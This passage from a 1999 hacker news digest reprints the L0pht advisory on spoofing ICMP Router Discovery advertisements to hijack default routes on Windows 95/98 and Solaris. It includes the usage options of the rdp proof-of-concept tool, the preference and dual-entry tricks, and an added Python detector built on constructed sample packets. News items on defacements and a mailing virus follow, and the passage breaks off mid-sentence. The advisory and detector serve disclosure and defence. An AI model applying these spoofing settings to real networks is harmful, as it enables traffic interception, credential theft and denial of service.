     From HNN http://www.hackernews.com/      

      contributed by Silicosis 
      By spoofing IRDP Router Advertisements, an attacker
      can remotely add default route entries on a remote
      system, including most Windows machines and some
      Solaris systems. The attacker's default route entry will
      be preferred over the DHCP server's default route. DHCP
      addressing is used by many corporations, cable modem
      systems, and dialup ISPs. This attack significantly
      increases a user's risk of passive snooping,
      man-in-the-middle attacks, and denial of service
      attacks. 

      L0pht Heavy Industries - Full advisory with sample code and patches      
      http://www.l0pht.com
      
      
            
            
                                L0pht Security Advisory               
         
                 Release date: August 11, 1999
                   Vulnerable: Microsoft Windows95a (w/winsock2), Windows95b
                               Windows98, Windows98se and Sun Microsystems
                               SunOS & Solaris operating systems.
                     Severity: Attackers can remotely add default route entries
                               on the victim's host.
                       Status: Microsoft contacted, fix provided.
                       Author: sili@l0pht.com
                          URL: http://www.L0pht.com/advisories.html
                  Source code: http://www.l0pht.com/advisories/rdp.tar.gz
                               code written by Silicosis & Mudge
      
      
      I. Problem
      ----------
      
        The ICMP Router Discovery Protocol (IRDP) comes enabled by default on
      DHCP clients that are running Microsoft Windows95 (w/winsock2),
      Windows95b, Windows98, Windows98se, and Windows2000 machines.  By
      spoofing IRDP Router Advertisements, an attacker can remotely add default
      route entries on a remote system.  The default route entry added by the
      attacker will be preferred over the default route obtained from the DHCP
      server. While Windows2000 does indeed have IRDP enabled by default, it
      is less vulnerable as it is impossible to give it a route that is preferred
      over the default route obtained via DHCP. 
      
        SunOS systems will also intentionally use IRDP under specific
      conditions. For Solaris2.6, the IRDP daemon, in.rdisc, will be started
      if the following conditions are met:
      
                      . The system is a host, not a router.
                      . The system did not learn a default gateway from a 
                        DHCP server.
                      . The system does not have any static routes.
                      . The system does not have a valid /etc/defaultrouter
                        file.
      
      It should be noted that the important point of this advisory is not
      that ICMP Router Solicitation and Advertisement packets have no 
      authentication properties. Yes, this is a problem but it has long been 
      known. The dangerous aspect comes in various MS platforms enabling 
      this protocol and believing it _even when the DHCP setup specifies 
      router information_ (ie the operating system does this even though 
      you believe you are telling it NOT TO).
      
      The tool provided with this advisory is the basis of what would 
      be used for everything from web page hacks, stealing credentials,
      modifying or altering data, etc. involving vulnerable systems. 
      We believe most cable modem DHCP clients and large internal 
      organizations are at risk.
        
      II. Risks
      ---------
      
        The ICMP Router Discovery Protocol does not have any form of
      authentication, making it impossible for end hosts to tell whether or not
      the information they receive is valid.  Because of this, attackers 
      can perform a number of attacks:
      
         Passive monitoring:  In a switched environment, an attacker
                              can use this to re-route the outbound traffic of
                              vulnerable systems through them.  This will allow
                              them to monitor or record one side of the
                              conversation.
                              
                              * For this to work, an attacker must be on the
                              * same network as the victim.
      
          Man in the Middle:  Taking the above attack to the next level, the
                              attacker would also be able to modify any of the 
                              outgoing traffic or play man in the middle. 
      
                              By sitting in the middle, the attacker can act as
                              a proxy between the victim and the end host. The
                              victim, while thinking that they are connected directly
                              to the end host, is actually connected to the
                              attacker, and the attacker is connected to the end
                              host and is feeding the information through.  If
                              the connection is to a secure webserver that uses SSL,
                              by sitting in the middle, the attacker would be able
                              to intercept the traffic, unencrypted. 
      
                              A good example of this risk is on-line banking;
                              an attacker playing man-in-the-middle would be able
                              to intercept all of the banking information that 
                              is relayed, without the victim's knowledge.
      
                              * For this to work, an attacker must be on the 
                              * same network as the victim.
      
          Denial of Service:  Remote attackers can spoof these ICMP packets and
                              remotely add bad default-route entries into a
                              victim's routing table.  Because the victim's
                              system would be forwarding the frames to the
                              wrong address, it will be unable to reach other
                              networks.
      
                              Unfortunately, DHCP has quickly become popular and is
                              relied upon in most companies. In some cases, such as
                              cable & *DSL modems, users are required to use DHCP.
      
                              Because of the large number of vulnerable systems,
                              and the fact that this attack will penetrate firewalls
                              that do not stop incoming ICMP packets, this Denial
                              of Service attack can become quite severe. 
                              
      
        It should be noted that the above attacks are documented in Section 7,
      of RFC 1256.  However, the RFC states that the attacks are
      launched by an attacker on the same network as the victim. In the Denial
      of Service attack, this is not the case; an attacker can spoof IRDP
      packets and corrupt the routing tables on systems that are on remote
      networks.
      
        While these attacks are not new, the fact that Windows95/98 DHCP
      clients have been vulnerable for years, is.  On systems running SunOS &
      Solaris, it is easy to find documentation on IRDP by looking at the
      startup scripts or manpages.  On Windows95/98, however, information
      has only recently become available in the Knowledge Bank.
      
      
      III. Technical Details
      ----------------------
      
       Upon startup, a system running MS Windows95/98 will always send 3 ICMP
      Router Solicitation packets to the 224.0.0.2 multicast address.  If the
      machine is NOT configured as a DHCP client, it ignores any Router
      Advertisements sent back to the host.
      
        However, if the Windows machine is configured as a DHCP client, any
      Router Advertisements sent to the machine will be accepted and processed.
      Once an Advertisement is received, Windows checks to see how many Gateway
      entries the packet contains.  If the packet contains only 1 entry, it
      checks to make sure the IP source address of the Advertisement is inside
      the host's subnet.   If it is, the Router Address entry inside the
      advertisement is checked to see that it is also within the host's subnet.
      If so, a new default route entry is added.  If the address is outside the
      subnet, the advertisement is silently ignored.
      
        If a host receives a Router Advertisement that contains 2 or more Router
      Addresses, the host will process the packet even though the IP source
      address is not local.  If the host finds a Router Address inside the
      advertisement that is inside the host's subnet, it will add a default
      route entry for it. 
      
        Because the host does not care about the IP source address of the
      Advertisement as long as it has more than one entry, attackers can now
      create bogus IRDP packets that will bypass anti-spoofing filters.
      
       Before the host can add a new default route entry, it has to determine
      the route metric.  On Windows95/98, normal default route entries obtained
      from a DHCP server have a metric of 1.  In order to determine the metric
      for the default route entry obtained via IRDP, the Windows host subtracts
      the Advertisement's Preference value from 1000.  By creating an ICMP
      Router Advertisement with a preference of 1000, the default gateway route
      added will have a metric of 0, making it the preferred default route.
      
       By adjusting the Lifetime value in the advertisement, an attacker can
      adjust how many seconds the gateways are valid for.
      
      
      IV. Fixes / Work-arounds
      ------------------------
      
       Firewall / Routers:
              Block all ICMP Type 9 & Type 10 packets.  This should protect
              against remote Denial of Service attacks.
      
       Windows95/98:
              
              The Microsoft Knowledge Base contains an article that gives info
              on how to disable IRDP. It can be found at:
      
              http://support.microsoft.com/support/kb/articles/q216/1/41.asp
              
              Brief Summary of article:
      
                IRDP can be disabled manually by adding the "PerformRouterDiscovery"
                value name and setting it to a dword value of 0, under the
                following registry key(s): 
      
                    HKLM\System\CurrentControlSet\Services\Class\NetTrans\####
      
                Where #### is the binding for TCP/IP. More than one TCP/IP
                binding may exist. 
      
       Solaris:
              
              Configure your host to obtain a default gateway through DHCP,
              static routes, or via the /etc/defaultrouter file. For more
              information on IRDP refer to in.rdisc's man-page. 
      
      
      V. Detection
      -------------
      
        L0pht has released an NFR Intrusion Detection Module to detect both
        Router Solicitations and Advertisements. You can find it at:
              http://www.l0pht.com/NFR
         
        NFR information can be found at http://www.nfr.net
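
        Added example (not part of the L0pht advisory, its NFR module or its
        rdp tool): a Python check a sensor could run on captured ICMP Type 9
        messages. It parses the RFC 1256 layout and applies the Windows95/98
        acceptance and metric rules described in Section III. The function
        names, the 192.0.2.0/24 host subnet and the hex samples are constructed
        for illustration.

```python
import ipaddress
import struct

ICMP_ROUTER_ADVERTISEMENT = 9   # ICMP type from RFC 1256
DHCP_ROUTE_METRIC = 1           # metric the advisory gives for DHCP-learned default routes

# Constructed sample ICMP payloads (IP header already stripped), lifetime 1800 s.
# Two entries: 192.0.2.1 with preference 1000 and 192.0.2.254 with preference 0.
SAMPLE_SPOOFED_MULTI = bytes.fromhex("0900650d02020708c0000201000003e8c00002fe00000000")
# One entry: 192.0.2.1 with preference 0.
SAMPLE_BENIGN_SINGLE = bytes.fromhex("09002cf401020708c000020100000000")
# One entry: 192.0.2.1 with preference 1000.
SAMPLE_REMOTE_SINGLE = bytes.fromhex("0900290c01020708c0000201000003e8")


def icmp_checksum(data: bytes) -> int:
    """Internet checksum; yields 0 when run over a message whose checksum is valid."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def parse_router_advert(icmp: bytes):
    """Parse a Router Advertisement; return (lifetime, [(router, preference), ...])."""
    if len(icmp) < 8:
        raise ValueError("truncated ICMP header")
    icmp_type, _code, _cksum, num_addrs, entry_words, lifetime = struct.unpack(
        "!BBHBBH", icmp[:8])
    if icmp_type != ICMP_ROUTER_ADVERTISEMENT:
        raise ValueError("not a Router Advertisement")
    if icmp_checksum(icmp) != 0:
        raise ValueError("bad ICMP checksum")
    if entry_words < 2:
        raise ValueError("address entry size below 2 words")
    entry_len = entry_words * 4
    if len(icmp) < 8 + num_addrs * entry_len:
        raise ValueError("fewer entries than Num Addrs claims")
    entries = []
    for i in range(num_addrs):
        off = 8 + i * entry_len
        # Router address, then the preference as a signed 32-bit value.
        raw_addr, pref = struct.unpack("!4si", icmp[off:off + 8])
        entries.append((ipaddress.IPv4Address(raw_addr), pref))
    return lifetime, entries


def assess_advert(src_ip: str, icmp: bytes, host_network: str):
    """Model the Section III rules for one host subnet and list what to alert on."""
    net = ipaddress.ip_network(host_network)
    lifetime, entries = parse_router_advert(icmp)
    src_local = ipaddress.IPv4Address(src_ip) in net
    # One entry: the IP source must be inside the subnet.
    # Two or more entries: processed even when the source is not local.
    processed = src_local if len(entries) == 1 else len(entries) >= 2
    # Only router addresses inside the host's subnet become default routes.
    routes = [(str(r), 1000 - p) for r, p in entries if r in net] if processed else []
    findings = []
    if routes and not src_local:
        findings.append("source %s is outside %s but the multi-entry "
                        "advertisement is still processed" % (src_ip, net))
    for router, metric in routes:
        if metric < DHCP_ROUTE_METRIC:
            findings.append("router %s gets metric %d, preferred over the DHCP "
                            "default route" % (router, metric))
    return {"lifetime": lifetime, "routes": routes, "findings": findings}


if __name__ == "__main__":
    cases = [("203.0.113.9", SAMPLE_SPOOFED_MULTI),
             ("192.0.2.1", SAMPLE_BENIGN_SINGLE),
             ("203.0.113.9", SAMPLE_REMOTE_SINGLE)]
    for src, pkt in cases:
        print(src, assess_advert(src, pkt, "192.0.2.0/24"))
```
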
      
      
      VI. Source Code
      ---------------
      
       L0pht is making available Proof-of-Concept code that will let individuals
      test their systems & firewalls.
      
      The source code can be found at: http://www.l0pht.com/advisories/rdp.tar.gz
      
      Usage is fairly straightforward:
      
      Usage: rdp -v -l -s -d <delay> -p <pref> -t <lifetime> -i <dev>
                 -S <src> -D <dst> -R <rtr> -r <optional 2nd rtr>
      
              -v verbose
              -l listen mode
              -s send mode
              -d <delay time between sending packets>
              -n <number of rdp packets to send>
              -I <ID value to place in IP packet>
              -p <preference level>
              -t <lifetime>
              -i <interface to use for sniffing>
              -S <source address to put in outgoing rdp packet>
              -D <destination address to put in outgoing rdp packet>
              -R <router address to advertise in rdp packet>
              -r <optional 2nd router address to advertise in rdp packet>
      
      
      Misc software notes:
      
      Listen Mode:    Software listens for ICMP Router Solicitations.  If the
                      '-s' flag is specified as well, the software will answer 
                      the Solicitations with ICMP Router Advertisements.
      
       Preference:    If the preference is not specified, it will use a default
                      of 1000, which will give the default route a metric of 0
                      on affected Windows systems.
      
      2nd Router Addr: By using the '-r' flag and specifying a second router address
                      entry, the packet can contain a bogus source address and still
                      be processed for correct gateway entries by the end host.
      
        
      @HWA
      
19.0 More Government Sites Defaced 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

     From HNN http://www.hackernews.com/      

      contributed by Code Kid 
      The Federal Energy Regulatory Commission has had its
      web page defaced by someone known as 'Sarin'. FERC is
      a government agency that regulates the transmission
      and sale of oil, natural gas, electricity and regulates
      hydroelectric projects. The web page defacement called
      for the replacement of the administrator of the site. 

      Also recently defaced was the U.S. Department of
      Commerce Institute for Telecommunication Sciences.
      This site was defaced by 'Pakistan Hackerz Club'; the
      page they left behind claimed to own America and
      threatened additional nuclear tests unless Pakistan's
      internal affairs are not messed with. 

      HNN Cracked Pages Archive
      http://www.hackernews.com/archive/crackarch.html
      ZD Net 
      http://www.zdnet.com/zdnn/stories/news/0,4586,2312517,00.html
      
      --------------------------------------------------------------
      This story was printed from ZDNN,
      located at http://www.zdnet.com/zdnn.
      --------------------------------------------------------------
      
      Another Fed Web site knocked out
      By Charles Cooper, ZDNN
      August 10, 1999 11:01 PM PT
      URL: 
      
      The Web site for the Federal Energy Regulatory Commission was hacked Tuesday night.
      
      Instead of the usual bureaucratic greetings found on government Web sites, people attempting to
      access the page were met by a cartoon character of a female vamp holding a whip.
      
      The hack, which was claimed by "Sarin," also left a brief note, taunting administrators for leaving
      their site vulnerable to hacks after "widespread publicity" given to copycat attacks in the last
      several months.
      
      "I'd seriously consider hiring a new admin if I were you," Sarin wrote.
      
      It was unclear when the Web site went down, but in an e-mail to ZDNN at 7:56 PM Pacific Time,
      Sarin wrote, "Does anyone care I have complete control over the Federal Energy Regulatory
      Commission?"
      
      Attempts to reach Sarin for comment were not immediately successful.
      
      Hackers intent on teaching sloppy system administrators an embarrassing lesson have carried out
      attacks against numerous federal Web sites this year, most prominently those operated by NASA,
      the National Oceanic and Atmospheric Administration and the United States Army.
      
      This isn't a new phenomenon. Indeed, in a 1998 report, the U.S. General Accounting Office
      chastised many government agencies for leaving holes in their information security defenses.
      
      @HWA     
      
20.0 Taiwan Strikes back at China via Net 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
     
      contributed by Albert 
      In response to recent attacks on various Taiwan
      government web sites some Taiwanese individuals are
      attacking web sites in mainland China. 

      Excite News      
      http://news.excite.com/news/r/990810/08/net-china-hacker
      
      Taiwan Cyber-Hackers Strike Back At China
                                                                                                                           
    

      Updated 8:38 AM ET August 10, 1999
    
      TAIPEI (Reuters) - Taiwan may be dwarfed by its saber-rattling rival, mainland China, but it has shown it is not to be trifled
      with on at least one battleground -- cyberspace.
    
      Hackers from the computer-savvy island have inserted pro-Taiwan messages into several Communist Chinese government Web
      sites in retaliation for a similar attack on Taiwan government sites by a mainland Chinese hacker.
    
      The web attacks sparked concern from military authorities who said an Internet war could add to already simmering tension
      over Taiwan's drive for equal status with the mainland.
    
      Taiwan news media reported Tuesday that several local hackers had succeeded in inserting Taiwan's flag, a sound file that
      played its national anthem and pictures of Taiwan presidential candidates on mainland Chinese Web sites.
    
      Statements like "Counter the Chinese Communists," "Taiwan does not belong to China" and "Seriously, Taiwan is better" also
      popped up on some of the sites.
    
      The hackers from Taiwan, which makes many of the world's computers, were also believed responsible for a revolving image of
      the Japanese cartoon figure Hello Kitty on one Web site.
    
      The hackers struck after a weekend attack on official Taiwan sites by a person claiming to be from mainland China, who
      inserted messages such as "Only one China exists and only one China is needed."
    
      The mainland hacker was apparently angered by Taiwan President Lee Teng-hui's call for "special state-to-state" ties between
      Taiwan and China, something Beijing has furiously condemned and threatened to punish with military action.
    
      Beijing views Taiwan as a wayward province and vows to bring it under mainland rule. 


     @HWA
     
21.0 Monopoly Virus Taunts Bill Gates and Microsoft 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
 
      From HNN http://www.hackernews.com/      
     
      contributed by nvirB 
      A new Melissa-like virus called VBS/Monopoly uses a
      picture of Bill Gates and a Monopoly board to taunt the
      giant company. The virus uses the Melissa-like tactic of
      sending itself to entries inside your address book but so
      far has not become widespread. It also sends a wide
      variety of information about the infected computer to
      numerous other email addresses. 

      MSNBC       
      http://www.msnbc.com/news/299142.asp
      
      Monopoly virus taunts Microsoft
                 
      Another Melissa-like work, this one could spread quickly but hasn't yet been
      discovered in the wild
                                 
                                                              By Bob Sullivan
                                                                      MSNBC

      Aug. 10 -- There's a new Melissa-like computer
      virus that not only attacks Microsoft software, it
      taunts the software giant's leader. The so-called
      VBS/Monopoly virus pops up a dialog box that
      says, "Bill Gates is guilty of monopoly. Here is
      the proof. :-)" and then displays a picture of
      Gates superimposed on a Monopoly game board.
      It also sends itself to every e-mail in the victim's
      address book. But anti-virus firms say the virus
      is not yet spreading widely around the Internet.
      
     NOTICE OF THE VIRUS WAS apparently first
     posted by a Russian anti-virus lab, Kaspersky Labs AVP,
     on Monday. 
            (Microsoft is a partner in MSNBC.)
            Like Melissa, it arrives to victims as an e-mail
     attachment to a note. The subject line on the e-mail is "Bill
     Gates joke." But unlike Melissa, anti-virus companies have
     been alerted to it before it was able to spread, so it won't
     likely have Melissa-like widespread impact.
            Users who don't double-click on the attachment, which
     is named MONOPOLY.VBS, cannot be infected. The .vbs
     extension indicates that the program is written in Microsoft's
     Visual Basic scripting language. According to Dan Takata
     of Data Fellows, programs written with VBScript operate
     only under Windows 98 and Windows 2000 (unless
     Windows Scripting Host has been installed separately). 
            Along with displaying the image of Gates, the
     worm/virus sends itself to every e-mail in the victim's
     Outlook address book. 


            It also collects information about the victim, including
     registered user name and organization, network computer
     name, country and area code, language, Windows version
     and Internet Explorer start page. It sends that information to
     a variety of e-mail addresses, probably to be accessed later
     by the virus author. 
            But the virus has not been detected "in the wild,"
     according to anti-virus companies.
            "It's still a zoo virus," said Network Associates' Tony
     Wells, meaning at the moment no victims have been
     identified, and the program has been confined to anti-virus
     laboratories. "We're classifying it as a low risk." Wells said
     Network Associates' anti-virus products have been
     updated to protect customers from the virus.
                                
     @HWA                            
  
22.0 FBI fingerprint database now online
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/      
     

     contributed by pigeon 
     Officials in 15 states can now submit fingerprints to an
     online database to look for possible matches. The
     database, known as the Integrated Automated
     Fingerprint Identification System, which cost $640
     million, contains the fingerprints of 34 million people.
     Searches now take two hours instead of 15 days. All 50
     states will eventually be connected to this system. 

     Nando Times
     http://www.nandotimes.com/technology/story/0,1643,80191-126589-888747-0,00.html
     
     FBI touts online fingerprint database 

      Copyright © 1999 Nando Media
      Copyright © 1999 Associated Press
      
      
      By VICKI SMITH 
      
      CLARKSBURG, W.Va. (August 10, 1999 6:58 a.m. EDT http://www.nandotimes.com) - A $640 million
      electronic database of fingerprints will help police nationwide decide within two hours whether
      a suspect should be freed on bail or held in custody, FBI officials say. 
      
      Instead of waiting more than 20 days for critical information, judges and law enforcement
      agencies in 15 states now can uncover a suspect's identity and criminal history before leaving
      the courthouse. 
      
      All 50 states are expected to be connected within the next few years. 
      
      The new Integrated Automated Fingerprint Identification System, which began operating July
      28, was expected to be dedicated by FBI Director Louis Freeh on Wednesday at the FBI's
      Criminal Justice Information Services center in Clarksburg. 
      
      It reduces to electronic data some 34 million fingerprint cards, the equivalent of 18 stacks as
      tall as New York's Empire State Building. 
      
      It also slashes the wait for civil background checks from more than three months to just 24
      hours, said James DeSarno, assistant director in charge of the Criminal Justice Information
      Services Division. 
      
      @HWA

23.0 45 Named as Enemies of the Internet 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     From HNN http://www.hackernews.com/      
     
     contributed by deepquest 
     45 nations have been named Enemies of the Internet by
     Reporters Sans Frontieres (RSF). The report lists
     countries it claims have blocked, filtered or all-out
     banned sections of the Internet. Some of the countries
     mentioned in the report were Azerbaijan, Kazakhstan,
     Burma, China, Cuba, Iran, Iraq, Libya, North Korea,
     Saudi Arabia, Sudan, Syria, Tunisia and Vietnam. 

     Yahoo Asia News
     http://asia.yahoo.com/headlines/100899/technology/934254300-134601.html
     
                                 
     PARIS, FRANCE, 1999 AUG 9 (NB)
     By Martyn Williams, Newsbytes.
     
     A new report by Reporters Sans Frontieres (RSF) has named 45 nations
     the group considers enemies of the Internet for the blocking and
     filtering or all-out banning the nations impose on Internet access.
     Of the 45 nations, RSF said 20 can be described as real enemies of
     the Internet for their actions. They are: the countries of Central
     Asia and the Caucasus (Azerbaijan, Kazakhstan, Kirghizia, Tajikistan,
     Turkmenistan and Uzbekistan), Belarus, Burma, China, Cuba, Iran, Iraq,
     Libya, North Korea, Saudi Arabia, Sierra Leone, Sudan, Syria, Tunisia
     and Vietnam.
      
      Many of the 20 nations are singled out for restrictions that make
     all Internet users access the network through a single, state-run
     ISP. These nations include Belarus, the nations of Central Asia, Sudan
     and Tunisia.
      
      China was singled out for its close monitoring of Internet use despite
     the rapid pace with which Internet use is growing. RSF singled out
     the case of computer technician Lin Hai, who was jailed for supplying
     Chinese e-mail addresses to a US-based dissident site that publishes
     an e-mail newsletter critical of the government, and the June closure
     of 300 unlicensed cybercafes in Shanghai.
      
      The group also highlighted China's periodic blocking of the Websites
     of dissident organizations and international news organizations
     including BBC Online and New Century Net.
      
      Other nations were taken to task for government-controlled filtering
     of the Internet which means, according to RSF, medical students in
     Iran are unable to access Websites dealing with anatomy and surfing
     via any of Saudi Arabia's private ISPs run through government filters
     that seek to maintain Islamic values.
      
      However, the situation is even worse in other countries.
      
      In Burma, said RSF, Internet access is via a state-run ISP and anyone
     who owns a computer must declare it to the government or face the
     possibility of a 15 jail sentence if the machine is discovered.
     Restrictions in Vietnam mean all Internet use has to be approved by
     the government through permits from the interior ministry and access
     via state-run ISPs.
       
       Journalists working for an online newspaper in Sierra Leone have been
     attacked, said RSF, with two from the daily The Independent Observer
     being arrested in June after accusations that they were working with
     the foreign based online newspaper Ninjas.
      
      And citizens of Iraq, Libya, North Korea and Syria have no direct
     access to the Internet and even the official sites of the governments
     of these countries are maintained on servers overseas. In the case
     of Iraq, the few official servers are in Jordan while the North Korean
     news agency maintains its site from Tokyo.
      
       Concluding its report, RSF called on the governments of the 20 nations
     to abolish the state monopoly on Internet access, the obligation on
     citizens to register before obtaining access, censorship through the
     use of filters, to lift controls on e-mail and enable more privacy
     online and to call off Internet-related legal proceedings.
       
       It also called on Burma, China, Cuba, Kazakhstan, Saudi Arabia and
     Tajikistan to ratify and enforce the International Covenant on Civil
     and Political Rights, Article 19 of which stipulates that "everyone
     shall have the right (...) to receive and impart information and ideas
     of all kinds, regardless of frontiers (...)".
       
       The covenant has been signed by a number of the 20 nations singled
     out in the report and RSF asked those countries to respect the contents
     of Article 19. Those countries include Azerbaijan, Belarus, Iran,
     Iraq, Kazakhstan, Kirghizia, Libya, North Korea, Uzbekistan, Sierra
     Leone, Sudan, Syria, Tunisia and Vietnam.
       
    @HWA          
    
24.0 Alliance Z3 Defaces Spanish Web Site 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
     
      From HNN http://www.hackernews.com/      

      contributed by Lionel 
      Yesterday (Wednesday), a group known as 'Alliance Z3',
      defaced the Spanish presidency's web site and left
      comments critical of the government. A government
      spokesperson admitted that the site was broken into,
      and that the original page has been restored. 

      Yahoo News - French       
      http://www.yahoo.fr/actualite/19990811/multimedia/934372020-yaho193.110899.134747.html
      
25.0 Government has a Hard Time with Bureaucracy 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     From HNN http://www.hackernews.com/      


      contributed by evilwench 
      A little intrigue, some misdirected government funds,
      just what has been going on with government network
      security anyway? FIDNet has been proposed but is now
      facing opposition, which looks very similar to what
      happened with Defensewide Information Systems
      Security Program (DISSP) back in 1996. So what
      happened? Where did the money go? Then last year
      there was Defensewide Information Assurance Program
      (DIAP) which also failed. Now FIDNet looks like it too will
      fail. Just what the hell is going on? 

      Network World Fusion - Registration May be Required (It's worth it though)      
      http://www.nwfusion.com/cgi-bin/go2.cgi?url=/news/1999/0802feat.html&uid=656d61696c
      (I hate subscription services)
      
26.0 Law Not a Substitute for Good Security 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     From HNN http://www.hackernews.com/      

      contributed by evilwench 
      Former federal prosecutor, Mark Rasch, says that while
      current cybercrime laws are extremely broad and could
      possibly be interpreted in such a way that makes most
      internet users criminals, businesses should still invest
      heavily on network security. 

      ZD Net      
      http://www.zdnet.com/zdnn/stories/news/0,4586,2312779,00.html
      
      
      Never a cop when you need one
      By David Raikow, Sm@rt Reseller
      August 11, 1999 10:46 AM PT
      URL: http://www.zdnet.com:80/zdnn/stories/news/0,4586,2312779,00.html
      
      In his keynote address at the WebSec security conference on Tuesday, former federal prosecutor
      Mark Rasch outlined one more rationale for a robust and comprehensive corporate security
      policy. If you're not prepared to respond to a system intrusion entirely in-house, you may be even
      less ready to deal with the consequences of going to the authorities for help, he warned. 
      
      Rasch, who was responsible for the prosecution of Robert Morris and the investigations of Kevin
      Mitnick and the "Cuckoo's Egg" hackers, described a legal system struggling to keep up with new
      technology and failing.
      
      In an attempt to address threats real and perceived, Congress has passed extraordinarily broad
      cybercrime laws, giving prosecutors enormous discretion, Rasch claimed. 
      
      We're all felons
      "We have enacted new statutes that make felons of us all," said Rasch. "If you've e-mailed your
      cousin from the office, you're probably a felon." 
      
      While law enforcement agencies aren't likely to bother with the average violation of corporate
      e-mail policy, their priorities are no more likely to match most users'. 
      
      Most IS shops probably would hope to chase intruders off as quickly and quietly as possible while
      minimizing the damages. But the FBI, according to Rasch, is probably more interested in a
      high-profile conviction and may want to prolong an intrusion in order to collect evidence. 
      
      The legal impact of a security breach may fall even more heavily on corporations than on the guilty
      party. An intruder using a company's servers to strike at other machines, for example, could leave
      that company exposed to "downstream liability" in civil court.
      
      And certainly a solvent corporation will present a more attractive defendant in such cases than the
      average cracker, he said. 
      
      Rasch laid out a situation in which an employee had used corporate servers to acquire and
      distribute pirated software. The business, which had unknowingly been using some of this
      software, was potentially subject to millions of dollars in fines. 
      
      Law is a 'blunt instrument'
      Rasch emphasized that it may be essential to notify the authorities after a breach, particularly as it
      may be required by law. Government agencies also have assets--subpoena powers, investigative
      resources--that may be necessary to adequately respond to an attack. 
      
      The key is to have an established plan for addressing these concerns so that employees are not
      forced to make ad-hoc decisions in the heat of the moment, he said. 
      
      "Law is a blunt instrument to use against cybercrime," Rasch concluded, "You should know what
      you're doing before you try."
      
      @HWA
      
27.0 Network-centric Warfare to be Used by Military 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     From HNN http://www.hackernews.com/      


      contributed by Code Kid 
      The San Jose Mercury News has an interesting interview
      with Vice Adm. Arthur K. Cebrowski, president of the
      Naval War College in Newport, R.I., on what he
      describes as network-centric warfare and how the
      armed forces are adapting to it. 

      San Jose Mercury News      
      http://www.sjmercury.com/svtech/news/indepth/docs/qa081199.htm
      
      Posted at 10:29 p.m. PDT Tuesday, August 10, 1999 

     Armed forces are adapting to
     network-centric warfare

     Vice Adm. Arthur K. Cebrowski, described as the U.S. Navy's computer guru, is
     president of the Naval War College in Newport, R.I., and instrumental in addressing
     military needs in the information age. Cebrowski outlined his ideas on network-centric
     warfare, which aims to link the Navy's resources -- from personnel to weapons --
     through a computer network, Tuesday at the Naval Postgraduate School in Monterey.
     Prior to the speech, Cebrowski spoke with Mercury News Staff Writer Shashank
     Bengali. This is an edited transcript of their conversation:

     Q - Where did the concept of network-centric warfare come from?

     A - It is the military's response to the information age. We can have well-informed soldiers and sailors and marines out there in the
     field but operating according to military principles that help organize their behavior. Forces will self-synchronize themselves from
     the bottom up, attaining a degree of efficiency and effectiveness that hasn't been possible before.

     Q - And you're able to coordinate forces over wide geographic areas as well?

     A - Yes. Just as in the information age, technology has changed the importance of territory and geography, you find the same thing
     in the military enterprise. That's why you see so much these days about striking targets from widely dispersed forces. So
     network-centric warfare derives its power from well-informed but geographically dispersed forces that have a high degree of
     shared awareness.

     Q - Do you think the military has lagged behind the rest of the world in implementing networking technology?

     A - There's a famous old Roman saying that the military walks in step with society but several paces back. And part of that is
     because the military is responsible for securing the most fundamental interests of the state; that is, the security of the people. And
     consequently, it tends to be strategically risk-averse. So before the military will make a dramatic shift, it will look for some very
     good evidence. We believe that that evidence is not only at hand, but that it's obvious, and the military is making that adjustment.

     Q - How much will you have to overhaul, or at least, shift, your personnel to accommodate these changes?

     A - One of the things that happens when there's a shift as great as this is that different skills are valued in different ways. And what
     you're seeing is a revaluing upward of those personnel who have facility in information tech broadly, both on the communication
     and executing side. It's also true in information-gathering, or what we call the ``sensing'' side. This is not just in war fighting, but it
     extends to everything we do. The secretary of the Navy divides its concerns into three areas: how we live, how we work and
     how we fight. We've been vigorously applying it at all three of those levels.

     Q - Give a few examples of how this has affected how you fight.

     A - Well, we've spent a considerable amount of money on what we call the IT21 program, Information Technology for the 21st
     century. What it is, is high-quality information exchange capability that is in our combat ships. We use it for the exchange of vital
     warfare information. If you look at how the operations were run in Kosovo, we don't have high-level meetings anymore, what
     we have is high-level collaborations with people at dispersed locations. The IT21 program allows us to do that from ships at sea.
     At the tactical level, we share information to bring combat power to bear via very high-quality data links, and that's the system by
     which we commit weapons and move forces.

     Q - How much has all this cost?

     A - It's been expensive (more than $1 billion over the last few years). However, the return on the investment has been enormous.
     And of course we don't measure return on investment the way stockholders do, we measure it in terms of increased combat
     power, and that's become very obvious to us.

     Q - What have been the changes in the third aspect, the way you live?

     A - We have wonderful experiences from our sailors deployed around the world, gone from home for extended periods of time,
     and now they are connected to their families on a daily basis. You have mitigated the great sense of loneliness. And, in fact,
     we've found that the retention rates among our sailors who are deployed in this modern technological environment are in fact
     higher than in the ships where we haven't been able to implement that kind of environment yet.

     Q - What kind of access do the sailors have to the technology?

     A - A few years ago, we deployed our first ship that had the capability of sending e-mail. We were so excited about that, that we
     actually counted the number of e-mails sent, and the number grew into the thousands. The Enterprise battle group recently
     returned from a long deployment, and they stopped counting e-mails past 5 million. It's no longer considered a novelty, it's just a
     fact of life.

     Q - How far along are you in implementing this across the Navy?

     A - By the end of 2001, we will have implemented the Navy-Marine Corps intranet. By the end of 2003, all of the ships in the
     Navy will have a very robust IT capability.

     Q - How did the previous system compare to what you're trying to put in now?

     A - It's not even a matter of saying it was a system. What you really had was a collection of capabilities that lacked
     standardization, interoperability, capacity. For example, one of the great concerns in combat is what's euphemistically called
     ``friendly fire'' (when an armed force accidentally kills one of its own). Of course, we don't like friendly fire. And information
